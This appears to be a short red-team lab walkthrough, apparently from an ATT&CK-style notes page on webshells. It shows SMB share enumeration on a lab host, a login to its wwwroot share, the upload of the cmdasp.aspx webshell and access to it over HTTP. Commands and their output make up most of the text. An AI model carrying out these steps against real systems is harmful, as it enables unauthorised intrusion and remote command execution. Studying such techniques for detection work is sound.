Enumerating victim host 10.0.0.6
for any shares:
attacker@localsmbclient -L //10.0.0.6 -U spot​WARNING: The "syslog" option is deprecatedEnter WORKGROUP\spot's password:​Sharename Type Comment--------- ---- -------ADMIN$ Disk Remote AdminC$ Disk Default shareCertEnroll Disk Active Directory Certificate Services shareIPC$ IPC Remote IPCNETLOGON Disk Logon server shareSYSVOL Disk Logon server sharetemp Disktools Disktranscripts Diskwwwroot Disk
Logging in to the wwwroot
share:
attacker@localsmbclient //10.0.0.6/wwwroot -U spot​WARNING: The "syslog" option is deprecatedEnter WORKGROUP\spot's password:Try "help" to get a list of possible commands.smb: \> ls. D 0 Sat Aug 25 16:57:52 2018.. D 0 Sat Aug 25 16:57:52 2018aspnet_client D 0 Tue Jul 31 20:11:20 2018iis-85.png A 99710 Tue Jul 31 19:35:48 2018iisstart.htm A 3 Tue Jul 31 19:38:23 2018
Uploading a webshell into the wwwroot
:
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx​putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)smb: \> ls. D 0 Sat Aug 25 16:59:47 2018.. D 0 Sat Aug 25 16:59:47 2018aspnet_client D 0 Tue Jul 31 20:11:20 2018c.aspx A 1400 Sat Aug 25 16:59:47 2018iis-85.png A 99710 Tue Jul 31 19:35:48 2018iisstart.htm A 3 Tue Jul 31 19:38:23 2018​6463487 blocks of size 4096. 3032260 blocks available
Same as above in a picture:
Attacker can now access the newly uploaded webshell via http://10.0.0.6/c.aspx
and start executing commands:
See T1108: Webshells for observations: